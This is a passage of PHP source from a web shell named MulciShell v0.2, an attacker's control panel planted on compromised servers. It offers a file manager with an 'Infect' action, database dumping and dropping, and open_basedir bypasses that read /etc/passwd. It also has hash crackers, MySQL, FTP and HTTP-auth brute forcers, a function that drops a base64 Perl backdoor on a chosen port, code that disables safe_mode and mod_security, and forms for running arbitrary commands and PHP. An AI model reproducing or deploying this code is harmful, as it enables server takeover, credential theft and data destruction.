if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");}
else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");}
$current=explode("/",$d);
echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++) 
for($p=0;$p<count($current);$p++)
{
		$cPath.=$current[$p].'/';
		echo "<a href=$self?d=$cPath>$current[$p]</a>/";
}
echo "</td></tr></table>";
if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>";
else echo "<form action='$self?' method='post'>";
echo "<table style='width: 100%'>
<tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td><td>Modified</td><td>Action</td></tr>";
while(($f=@readdir($dh)))
{
	if(@is_dir($d.'/'.$f)) $dirs[]=$f;
	else $files[]=$f;
}
asort($dirs);
asort($files);
@closedir($dh);
	foreach($dirs as $f)
	{
		@$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
		@$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
		if(is_array($grp)) $grp=$grp['name'];
		if(is_array($own)) $own=$own['name'];
		$size="DIR";
		@$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2);
		@$write=is_writable($d.'/'.$f)?"Yes":"No";
		$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
		if($f==".") {continue;}
		elseif($f=="..") 
		{
		$f=Trail($d.'/'.$f);
		echo "<tr><td><a href='$self?act=files&d=$f'>..</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>";
		continue;
		}
		echo "<tr><td><a href='$self?act=files&d=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
	}
	foreach($files as $f)
	{
		@$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
		@$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
		if(is_array($grp)) $grp=$grp['name'];
		if(is_array($own)) $own=$own['name'];
		@$size=TrueSize(filesize($d.'/'.$f));
		@$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3);
		@$write=is_writable($d.'/'.$f)?"Yes":"No";
		@$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
		echo "<tr><td><a href='$self?act=f&file=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
	}
	echo "</table>
	<input type='button' style='background-color: none; border: 1px solid white;' value='Toggle' onClick='togglecheck()'></br>
	With checked file(s): 
	<select name='fileaction'>
	<option name='chmod'>Chmod</option>
	<option name='delete'>Delete</option>
	<option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'>
	</select>
	<br><input type='submit' value='Go' name='massfiles'></form>";
function SQLLogin()
{
	global $self;
	if(!isset($_SESSION['log'])&&!isset($_POST['mconnect']))
	{
		echo "<center><form action='$self?act=sql' method='post'>
		Host: <input type='text' value='localhost' name='mhost'>
		Username: <input type='text' value='root' name='muser'>
		Password: <input type='password' value='' name='mpass'>
		Port: <input type='text' style='width: 40px' value='3306' name='mport'>
		<input type='submit' value='Connect' name='mconnect'>
		</form>
	</center>";
	} 
	elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect']))
	{
		extract($_POST);
		$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
		if($conn)
		{
			$_SESSION['muser']=$muser;
			$_SESSION['mhost']=$mhost;
			$_SESSION['mpass']=$mpass;
			$_SESSION['mport']=$mport;
			$_SESSION['log']=true;
			header("Location: $self?act=sqledit");
		}
		    else 
			echo "Failed to login with $muser@$mhost!<br>";
	} else {
		header("Location: $self?act=sqledit");
	}
}
function SQLEditor()
{
	extract($_SESSION);
	$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
	if($conn)
	{
			echo "Logged in as $muser@$mhost <a href='$self?act=logout'>[Logout]</a><center>";
			echo "<form method='POST' action='$self?'>
			Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'>
			<input type='hidden' name='db' value='$_GET[db]'>
			<input type='submit' value='Go' name='sql'>
			</form>";
			echo "<form action='$self?act=sqledit' method='post'>
			<input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'>
			</form></center></br></br>";
			if(isset($_POST['sql_list_proc']))
			{
				$res=mysql_list_processes();
				echo "<table style='margin: auto; text-align: center;'><tr>
				<td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td>
				</tr>";
				while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[Id]</td><td>$r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time]</td></tr>";
				mysql_free_result($res);
				echo "</table></br>";
			}
		if(!isset($_GET['db']))
		{
			if(isset($_POST['dbc'])) db_create();
			if(isset($_GET['dropdb'])) SQLDrop();
			echo "<table style='margin: auto; text-align: center;'>
			<tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>";
			$all_your_base=mysql_list_dbs($conn);
			while($your_base=mysql_fetch_assoc($all_your_base))
			{
				$tbl=mysql_query("SHOW TABLES FROM $your_base[Database]");
				$tbl_count=mysql_num_rows($tbl);
				echo "<tr><td><a href='$self?act=sqledit&db=$your_base[Database]'>$your_base[Database]</td><td>$tbl_count</td><td><a href='$self?act=download&db=$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$your_base[Database]'>Drop</a></td></tr>";
			}
			echo "</table></br><center><form action='$self?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>";
		}
		elseif(isset($_GET['db'])&&!isset($_GET['tbl']))
		{
			if(isset($_POST['tblc'])) table_create();
			if(isset($_GET['droptbl'])) SQLDrop();
			echo "<table style='margin: auto; text-align: center;'>
			<tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>";
			$tables=mysql_query("SHOW TABLES FROM $_GET[db]");
			while($tblc=mysql_fetch_array($tables))
			{
				$fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]");
				$fc=mysql_num_rows($fCount);
				echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$tblc[0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tbl=$tblc[0]'>Dump</td><td><a href='$self?act=sqledit&db=$_GET[db]&droptbl=$tblc[0]'>Drop</a></td></tr>";
			}
			echo "</table></br><center><form action='$self?act=sqledit&db=$_GET[db]' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>";
		}
			elseif(isset($_GET['field'])&&isset($_POST['sqlsave']))
			{
				$discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
				$values=mysql_fetch_assoc($discard_values);
				$keys=array_keys($values);
				$values=array();
				foreach($_POST as $k=>$v)
				if(in_array($k,$keys)) $values[]=$v;
				$query="UPDATE $_GET[db].$_GET[tbl] SET ";
				for($y=0;$y<count($values);$y++)
				{
					if($y==count($values)-1)
					$query.="$keys[$y]='$values[$y]' ";
					else
					$query.="$keys[$y]='$values[$y]', ";
				}
				$query.="WHERE $_GET[field] = '$_GET[v]'";
				$try=mysql_query($query) or die(mysql_error());
				echo "<center>Table updated!<br>";
				echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>";
				
			}
			elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del']))
			{
				echo "<center><form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>";
				$sql_fields=array();
				$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
				while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field'];
				$data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
				$d_piece=mysql_fetch_assoc($data);
				for($m=0;$m<count($sql_fields);$m++)
				{
					$point=$sql_fields[$m];
					echo "$point: <input type='text' value='$d_piece[$point]' name='$sql_fields[$m]'></br>";
				}
				echo "<input type='submit' value='Save' name='sqlsave'></form></center>";
			}
			elseif(isset($_GET['db'])&&isset($_GET['tbl']))
			{
				if(isset($_GET['insert'])) SQLInsert();
				if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del']))
				{
					echo "<center>";
					if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted</br>";
					else echo "Failed to delete row</br>";
					echo "</center>";
				}
				echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1'>[Insert new row]</a></center>";
				echo "<table style='margin: auto; text-align: center;'><tr>";
				$cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
				$fields=array();
				while($col=mysql_fetch_assoc($cols))
				{
					array_push($fields,$col['Field']);
					echo "<td>$col[Field]</td>";
				}
				echo "</tr>";
				if(isset($_GET['s'])&&is_numeric($_GET['s']))
				{$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");}
				else
				{$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");}
				while($select=mysql_fetch_row($selector))
				{
					echo "<tr>";
					for($i=0;$i<count($fields);$i++)
					{
						echo "<td>".htmlspecialchars($select[$i])."</td>";	
					}
					echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Delete</a></td>";
					echo "</tr>";
				}
				echo "</table>";
				echo "<table style='margin: auto;'>";
				if(isset($_GET['s']))
				{
					$prev=intval($_GET['s'])-250;
					$next=intval($_GET['s'])+250;
					if($_GET['s']>0)
					echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$prev'>Previous</a></td>";
					if(mysql_num_rows($selector)>249)
					echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$next'>Next</a></td></tr>";
				}
				else echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=250'>Next</a></center>";
				echo "</table>";
			}
	else
	{
		$_SESSION=array();
		session_destroy();
		header("Location: $self?act=sql");
	}
 }
}
function SQLDownload() 
{
	extract($_SESSION);
	$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
	if($conn)
	{
		if(isset($_GET['db'])&&!isset($_GET['tbl']))
		{
			$tables=array();
			$dump_file="##################SQL Database dump####################\n";
			$dump_file.="######################Dumped by: MulciShell v0.2#####################\n\n";
			$get_tables=mysql_query("SHOW TABLES FROM $_GET[db]");
			while($current_table=mysql_fetch_array($get_tables))
			$tables[]=$current_table[0];
			foreach($tables as $table_dump)
			{
				$data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump");
				while($current_data=mysql_fetch_assoc($data_selection))
				{
					$fields=implode("`, `", array_keys($current_data));
					$values=implode("`, `",array_values($current_data));
					$dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); ";
				}
			}
		} elseif(isset($_GET['db'])&&isset($_GET['tbl']))
		{
			$dump_file="##################SQL Database dump####################\n";
			$dump_file.="######################Dumped by: MulciShell v0.2#####################\n";
			$table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]");
			while($table_data=mysql_fetch_assoc($table_dump))
			{
				$fields=implode("`, `",array_keys($table_data));
				$values=implode("`, `",array_values($table_data));
				$dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n";
			}
		} else {
			echo "Invalid!";
		}
	}
	$dump_file.="########################################################################################";
	if(!isset($_GET['tbl']))
	$file_name="$_GET[db]"."_DUMP.sql";
	else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql";
	ob_get_clean();
	header("Content-type: application/octet-stream");
    header("Content-length: ".strlen($dump_file));
  	header("Content-disposition: attachment; filename=$file_name;");
  	echo $dump_file;
	exit;
}
function SqlInsert()
{
	extract($_SESSION);
	$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
	if($conn)
	{
		if(!isset($_POST['sql_insert']))
		{
			echo "<form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1' method='post'><center>";	
			$sql_fields=array();
			$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
			while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];		
			for($s=0;$s<count($sql_fields);$s++)
			echo "$sql_fields[$s]:  <input type='text' name='$sql_fields[$s]'></br>";
			echo "<input type='submit' value='Insert' name='sql_insert'></center></form>";
		} else {
			$fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
			while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];	
			$values=array();
			$keys=array();
			$query="INSERT INTO $_GET[db].$_GET[tbl] (";
			foreach($_POST as $k=>$v)
			{
				if(in_array($k,$sql_fields)&&!empty($v))
				{
					$values[]=$v;
					$keys[]=$k;
				}
			}
			for($k=0;$k<count($keys);$k++) 
			{
				if($k==count($keys)-1) $query.="`$keys[$k]`";
				else
				$query.="`$keys[$k]`,";
			}
			$query.=") VALUES (";
			for($v=0;$v<count($values);$v++)
			{
				if($v==count($values)-1) $query.="'$values[$v]'";
				else
				$query.="'$values[$v]',";
			}
			$query.=")";
			echo "<center>";
			if(@mysql_query($query)) echo "Row inserted</br>";
			else echo "Failed to insert row</br>";
			echo "</center>";
		}
	}
}
function SQLDrop()
{
	echo "<center>";
	extract($_SESSION);
	$conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
	if($conn)
	{
		if(!isset($_GET['droptbl']))
		{
			$query="DROP DATABASE $_GET[dropdb]";
			if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped<br>";
			else echo "Failed to drop database $_GET[dropdb]<br>";
		} elseif(isset($_GET['db'])&&isset($_GET['droptbl']))
		{
			$query="DELETE FROM $_GET[db].$_GET[droptbl]";
			if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped<br>";
			else echo "Failed to drop table $_GET[droptbl]<br>";
		} else {
			echo "Invalid request<br>";
		}
	} else echo "Failed to connect<br>";
	echo "</center>";
}
function db_create()
{
	echo "<center>";
	if(isset($_POST['db_name']) && !empty($_POST['db_name']))
	{
		extract($_SESSION);
		@$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
		if($conn)
		{
			if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!";
			else echo "Failed to create database $_POST[db_name]</br>";
		} else echo "Failed to connect</br>";
	} else echo "Enter a DB name</br>";
	echo "</cenetr>";
}
function table_create()
{
	echo "<center>";
	if(isset($_POST['table_name'])&&!empty($_POST['table_name']))
	{
		extract($_SESSION);
		@$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
		if($conn)
		{
			@mysql_select_db($_POST['db_current']);
			if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!";
			else echo "Failed to create table $_POST[table_name]";
		} else echo "Failed to connect!</br>";
	} else echo "Enter a table name</br>";
	echo "</center>";
}
function FileEditor()
{
	if(isset($_GET['file']))
	$file=$_GET['file'];
	elseif(isset($_POST['nfile']))
	$file=$_POST['nfile'];
	elseif(isset($_POST['editfile']))
	$file=$_POST['editfile'];
	if(@!file_exists($file)) die("Permission denied!");
	if(isset($_POST['dfile']))
	{
		@$fh=fopen($file,'r');
		@$buffer=fread($fh,filesize($file));
		header("Content-type: application/octet-stream");
   		header("Content-length: ".strlen($buffer));
  		header("Content-disposition: attachment; filename=".basename($file).';');
		@ob_get_clean();
  		echo $buffer;
		@fclose($fh);
	}
	elseif(isset($_POST['delfile']))
	{
		if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br>";
		else echo "File deleted<br>";
	}
	elseif(isset($_POST['sfile']))
	{
		$fh=@fopen($file,'w') or die("Failed to open file for editing!");
		@fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents']));
		echo "File saved!";
		@fclose($fh);
	}
	else
	{
		$fh=@fopen($file,'r');
		echo "<center>
		<form action='$self?act=f' method='post'>
		File to edit: <input type='text' style='width: 300px' value='$file' name='nfile'>
		<input type='submit' value='Go' name='gfile'></br></br>";
		echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialchars(@fread($fh,filesize($file)))."</textarea></br></br>";
		echo "<input type='submit' value='Save file' name='sfile'>
		<input type='submit' value='Download file' name='dfile'>
		<input type='submit' value='Delete file' name='delfile'>
		</center></form>";
		@fclose($fh);
	}
}
function security_bypass()
{
	if(isset($_POST['curl_bypass']))
	{
		$ch=curl_init("file://$_POST[file_bypass]");
		curl_setopt($ch,CURLOPT_HEADERS,0);
		curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
		$file_out=curl_exec($ch);
		curl_close($ch);
		echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
	}
	elseif(isset($_POST['tmp_bypass']))
	{
		tempnam("/home/",$_POST['file_passwd']);
	}
	elseif(isset($_POST['copy_bypass']))
	{
		
		if(@copy($_POST['file_bypass'],$_POST['dest'])) 
		{
			echo "File successfully copied!</br>";
			@$fh=fopen($_POST['dest'],'r');
			echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>";
			@fclose($fh);
		} else echo "Failed to copy file</br>";
	}
	elseif(isset($_POST['include_bypass']))
	{
		if(file_exists($_POST['file_bypass']))
		{
			echo "<textarea rows='20' cols='150' readonly>";
			@include($_POST['file_bypass']);
			echo "</textarea>";
		}
	}
	elseif(isset($_POST['sql_bypass']))
	{
		extract($_SESSION);
		$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
		if($conn)
		{
			mysql_select_db($_POST['sql_db']);
			mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);");
			mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error());
			$res=mysql_query("SELECT * FROM $_POST[tmp_table]");
			if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!");
			if($res)
			{
				while($row=mysql_fetch_array($res)) $f.="$row[0]</br>";
				echo $f;
			}
		mysql_query("DROP TABLE $_POST[tmp_table]");
		}
	}
	echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr>
	<tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr>
	<tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr>
	<tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr>
	<tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr>
	<tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr>
	<tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr>
	</table>";
}
function brute_force()
{
	echo "<form action='$self' method='post' enctype='multipart/form-data'><input type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Password crackers</td></tr>
	<tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr>
	<tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value='Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr>
	<tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr>
	<tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack'></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr>
	<tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr>
	<tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: <input type='text' value='localhost' name='mysql_host'></br>Port: <input type='text' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name='mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br>Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input type='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td></tr>
	<tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr>
	<tr><td>Login form: <input type='text' value='' name='remote_login_target'></br>Username: <input type='text' value='admin' name='remote_login_user'><input type='submit' value='Brute' name='remote_login'></td><td>Username: <input type='text' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' name='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr>
	<tr><td colspan='2'>Wordlist</td></tr>
	<tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr>
	</br></table></form>";
}
function BackDoor()
{
	global $backdoor_perl;
	global $disable;
	if(!isset($_POST['backdoor_host']))
	{
		echo "<center><form action='$self?act=bh' method='post'>
		Port: <input type='text' name='port'>
		<input type='submit' name='backdoor_host' value='Backdoor'></center>";
	} else {
		@$fh=fopen("shbd.pl","w");
		@fwrite($fh,base64_decode($backdoor_perl));
		@fclose($fh);
		execmd("perl shbd.pl $_POST[port]",$disable);
		echo "Server backdoor'd</br>";
	}
}
function disable_sec()
{
	@$ini=fopen("php.ini","w ");
	@fwrite($ini,"disable_functions=
	open_basedir=Off
	safe_mode=Off
	safe_mode_gid=Off
	remote_includes=On
	");
	@$hta = fopen(".htaccess","w ");
	@fwrite($hta,"<IfModule mod_security.c>
	SecFilterEngine Off
	SecFilterScanPOST Off
	SecFilterCheckURLEncoding Off
	SecFilterCheckUnicodeEncoding Off
    </IfModule>");
	@fclose($ini);
	@fclose($hta);
}
function sql_rep_search($dir)
{
	global $self;
	$ext=array(".db",".sql");
	@$dh=opendir($dir);
	while((@$file=readdir($dh)))
	{
		$ex=strrchr($file,'.');
		if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db")
		echo "<tr><td><center><a href='$self?act=f&file=$dir"."$file'>$dir"."$file</center></td></tr>";
		if(is_dir($dir.$file)&&$file!='..'&&$file!='.')
		{
			if(!preg_match("/\/public_html\//",$dir))
			sql_rep_search($dir.$file.'/public_html/');
			else 
			sql_rep_search($dir.$file);
		}
	}
	@closedir($dh);
}
function database_tools()
{
	if(isset($_POST['sql_start_search'])) 
	{
		echo "<center><table style='width: auto;'><tr><td><center><font color='#FF0000'>Databases</font></center></td></tr>";
		sql_rep_search("/home/");
		echo "</table></center>";
	}
	$colarr=array();
	if(isset($_POST['db_parse']))
	{
		if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse...");
		$db_meth=empty($_POST['db_dpath'])?'uploaded':'path';
		$q_delimit=$_POST['q_delimit'];
		if(isset($_POST['column_defined']))
		{
			switch($_POST['column_type'])
			{
				case 'SMF':
				break;
				case 'phpbb':
				break;
				case 'vbulletin':
				$colarr=array(4,5,7,48);
				break;
			}
		} else {
			$strr=str_replace(", ",",",trim($_POST['db_columns']));
			$colarr=explode(",",$strr);
		}
		switch($db_meth)
		{
			case 'uploaded':
			@$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading");
			break;
			case 'path':
			@$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading");
			break;
		}
			echo "Parsing database contents...</br>";
			while(!feof($fh))
			{
				$c_line=fgets($fh);
				$strr=str_replace(", ",",",$c_line);
				$arr=explode(',',$strr);
				for($i=0;$i<count($colarr);$i++)
				{
					$index=$colarr[$i];
					if(empty($arr[$index])) continue;
					$spos=strpos("$_POST[q_delimit]",$arr[$index]);
					$spos=strpos("$_POST[q_delimit]",$arr[$index],$spos);
					if($i!==count($colarr)-1)
					echo "$arr[$index] : ";
					else echo "$arr[$index]</br>";
				}
				continue;
		     } 
			 @fclose($fh);
	}
	echo "<table style='width: 100%; margin: auto; text-align: center'>
	<tr><td colspan='2'>Database parser</td></tr>
	<tr><td>
	<form action='$self?act=dbs' method='post' enctype='multipart/form-data'>
	Quote delimiter (usually ` or '): <input type='text' style='width: 20px' name='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type='text' style='width: 200px' name='db_columns' value='3,5,10'></br>
	Use predefined column match (user+pass+salt): <input type='checkbox' name='column_defined'> <select name='column_type'>
	<option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option><option value='phpbb'>PHPBB</option>
	</select></br>
	Path to DB dump: <input type='text' style='width: 300px' value='/home/someuser/public_html/backup.db' name='db_dpath'>
	</br>Upload DB dump: <input type='file' style='width: 300px' value='' name='db_upath'>
	</br></br><input type='submit' style='width: 300px' value='Parse Database' name='db_parse'></td></tr>
	<tr><td colspan='2'>Find database Backups</td></tr>
	<tr><td>Only search within local path: <input type='checkbox' name='sql_search_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></tr>
	</table>";
}
function show_tools()
{
	echo "<form action='$self' method='post'>
	<table style='width: 100%; margin: auto; text-align: center'>
	<tr><td colspan='2'>Tools</td></tr>
	<tr><td>Forum locator</td><td>Config locator</td></tr>
	<tr><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_configs'></form></td></tr>
	<tr><td>Port scanner</td><td>Search</td></tr>
	<tr><td><form action='$self' method='post'>Host: Start port: <input type='text' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50px' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_scan'>Using: <select name='type'><option value='php'>PHP</option><option value='perl'>Perl</option></select></form></td><td>Finish this next</td></tr>
	</table>";
}
function TrueSize($s)
{
	if(!$s) return 0;
	if($s>=1073741824) return(round($s/1073741824)." GB");
	elseif($s>=1048576) return(round($s/1048576)." MB");
	elseif($s>=1024) return(round($s/1024)." KB");
	else return($s." B");
}
function CleanDir($d)
{
	$d=str_replace("\\","/",$d);
	$d=str_replace("//","/",$d);
	return $d;
}
function Trail($d)
{
	$d=explode('/',$d);
	array_pop($d);
	array_pop($d);
	$str=implode($d,'/');
	return $str;
}
function Encoder()
{
	echo "<form action='$self?' method='post'>
	<center>
	Input: <input type='text' style='width: 300px' name='encrypt'>
	<br><input type='submit' value='Encrypt' name='encryption'>
	</center>
	</form>";
}
$relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd()));
if(isset($_GET['d'])) $self.="?d=$_GET[d]";
echo "<table style='text-align: center; width: 100%'>
<tr><td colspan='2'>Execute command</td></tr>
<tr><td colspan='2'><form action='$self?' method='post'><input type='text' style='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' value='Execute'></form></td></tr>
<tr><td colspan='2'>Execute PHP</td></tr>
<tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols='80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</textarea><input type='submit' name='execphp' value='Execute'></form></td></tr>
<tr><td>Create directory</td><td>Create file</td></tr>
<tr><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' name='cnewdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type='submit' value='Create' name='cnewfile'></form></td></tr>
<tr><td>Enter directory</td><td>Edit file</td></tr>
<tr><td><form action='$self' method='post'><input type='text' style='width: 225px' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go'></form></td></tr>
<tr><td>Upload file</td><td>Wget file</td></tr>
